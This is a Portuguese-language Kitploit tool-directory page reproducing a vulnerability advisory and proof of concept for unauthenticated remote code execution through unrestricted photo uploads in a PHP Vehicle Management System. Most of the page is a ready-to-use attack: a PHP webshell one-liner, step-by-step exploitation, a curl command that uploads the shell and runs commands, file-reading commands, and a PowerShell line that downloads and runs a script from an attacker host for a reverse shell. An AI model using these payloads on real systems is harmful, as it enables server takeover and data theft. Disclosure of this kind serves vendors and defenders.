Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-11344-RCE — Exploit de execução remota de código não autenticada para Vehicle Management System em PHP via upload de arquivo irrestrito em newdriver.php e newvehicle.php, com PoC e etapas detalhadas de reprodução. | Kitploit
Ferramentas/GitHubGitHub/xmyronn/cve-2026-11344-rce
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubxmyronn/cve-2026-11344-rce

CVE-2026-11344-RCE

Exploit de execução remota de código não autenticada para Vehicle Management System em PHP via upload de arquivo irrestrito em newdriver.php e newvehicle.php, com PoC e etapas detalhadas de reprodução.

2há 3 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de Gerenciamento de Veículos em PHP - Execução Remota de Código Não Autenticada via Upload de Arquivo em newdriver.php

Informações da Vulnerabilidade

CampoDetalhes
ProdutoVehicle Management System In PHP
Fornecedorcode-projects.org
VersãoV1.0
Tipo de VulnerabilidadeUpload de Arquivo Irrestrito levando à Execução Remota de Código (CWE-434)
Arquivos Afetadosnewdriver.php, newvehicle.php
Parâmetrophoto (POST, multipart/form-data)
Autenticação NecessáriaNão (Não Autenticado)
Pontuação CVSS10.0 Crítico
Vetor de AtaqueRemoto / Rede
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma

Descrição

O Vehicle Management System In PHP V1.0 da code-projects.org é vulnerável à Execução Remota de Código não autenticada via upload irrestrito de arquivo em newdriver.php (e identicamente em newvehicle.php).

A aplicação expõe um formulário de registro 'Novo Motorista' somente para administradores em newdriver.php que inclui um campo de upload de foto. No entanto, o endpoint não realiza nenhuma validação de sessão — qualquer atacante não autenticado pode acessá-lo diretamente sem ser redirecionado ao login. Além disso, o campo de upload de foto aceita qualquer tipo de arquivo, incluindo arquivos PHP, sem filtragem de extensão, validação de tipo MIME ou inspeção de conteúdo.

Um atacante pode:

  1. Visitar diretamente newdriver.php sem qualquer sessão ou credenciais
  2. Enviar o formulário do motorista com um webshell PHP como a 'foto'
  3. O shell é salvo no diretório /picture/
  4. Navegar até o shell enviado e executar comandos arbitrários do sistema operacional no servidor

Isso resulta em Execução Remota de Código completa com os privilégios do processo do servidor web.


Cadeia da Vulnerabilidade

root@kitploit:~
Requisição HTTP Não Autenticada
        ↓
newdriver.php (sem verificação de sessão)
        ↓
campo photo aceita arquivo .php (sem validação de tipo de arquivo)
        ↓
Shell salvo em /picture/web_shell.php
        ↓
GET /picture/web_shell.php?cmd=whoami
        ↓
RCE — execução arbitrária de comandos do SO

Passos para Reproduzir

Passo 1 — Confirmar acesso não autenticado a newdriver.php

Abra um navegador limpo sem sessão (janela anônima/privada). Navegue diretamente para o endpoint:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

O formulário Novo Motorista carrega com sucesso sem verificação de autenticação e sem redirecionamento ao login.

Captura de tela 2026-05-19 175610

Passo 2 — Preparar o webshell PHP

Crie um webshell simples de execução de comandos PHP:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Salve como shell.php (ou qualquer nome de arquivo .php).


Passo 3 — Enviar o formulário com o webshell como a foto

Preencha os campos do formulário do motorista com quaisquer valores e selecione o webshell PHP como o upload da foto:

root@kitploit:~
Nome do Motorista:        test
Celular:             1234567890
Data de Entrada do Motorista: 2026-05-19
Identidade Nacional:        test
Nº da Carteira:         test
Data de Validade da Carteira:   2026-05-30
Endereço do Motorista:     test
Foto:              shell.php   ← webshell PHP enviado aqui

Clique em Submit Query.

Captura de tela 2026-05-19 175622
Captura de tela 2026-05-19 175708

Passo 4 — Upload do shell confirmado

A aplicação responde com "Registration Completed!" — confirmando que o shell PHP foi aceito e salvo sem nenhuma validação.

Captura de tela 2026-05-19 175718

Passo 5 — Executar comandos arbitrários através do shell enviado

Navegue até o shell enviado no diretório /picture/ e passe comandos do SO através do parâmetro cmd:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

O servidor executa o comando e retorna a saída:

root@kitploit:~
desktop-g1i9np3\dell
Captura de tela 2026-05-19 175759

Passo 6 — Exemplos adicionais de execução de comandos

root@kitploit:~
# Ler arquivos sensíveis
http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# Listar raiz da web
http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Reverse shell completo via PowerShell
http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Segundo Endpoint Afetado — newvehicle.php

A vulnerabilidade idêntica existe em newvehicle.php. Um atacante não autenticado pode acessar o formulário Adicionar Novo Veículo, enviar um webshell PHP através do campo de foto do veículo e obter RCE através do mesmo método.

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

Ambos os endpoints compartilham a mesma causa raiz: nenhuma validação de sessão e nenhuma restrição de upload de arquivo.


PoC curl (Uma linha)

root@kitploit:~
curl -s -X POST \
  "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php" \
  -F "dname=test" \
  -F "mobile=1234567890" \
  -F "djoiningdate=2026-05-19" \
  -F "nid=test" \
  -F "licenseno=test" \
  -F "licenseenddate=2026-05-30" \
  -F "daddress=test" \
  -F "[email protected];type=image/jpeg" \
  && echo "[+] Shell uploaded" \
  && curl -s "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami"

Impacto

  • Execução Remota de Código Não Autenticada — qualquer atacante anônimo na rede obtém execução completa de comandos do SO
  • Comprometimento completo do servidor — acesso de leitura/escrita a todos os arquivos, credenciais, configuração do banco de dados
  • Nenhuma interação necessária — exploit totalmente automatizado em uma única requisição HTTP
  • Dois endpoints afetados — newdriver.php e newvehicle.php ambos vulneráveis

Arquivos Afetados

ArquivoCampo de UploadCaminho de Armazenamento do Shell
newdriver.phpphoto/picture/
newvehicle.phpphoto/picture/

Informações do Fornecedor

  • Página do Fornecedor: https://code-projects.org/vehicle-management-system-in-php-with-source-code/
  • Download: https://code-projects.org/vehicle-management-system-in-php-with-source-code/

Descoberto Por

Syed Imad Uddin Alvi (imad alvi)
Pesquisador de Segurança Independente

Baixar ferramenta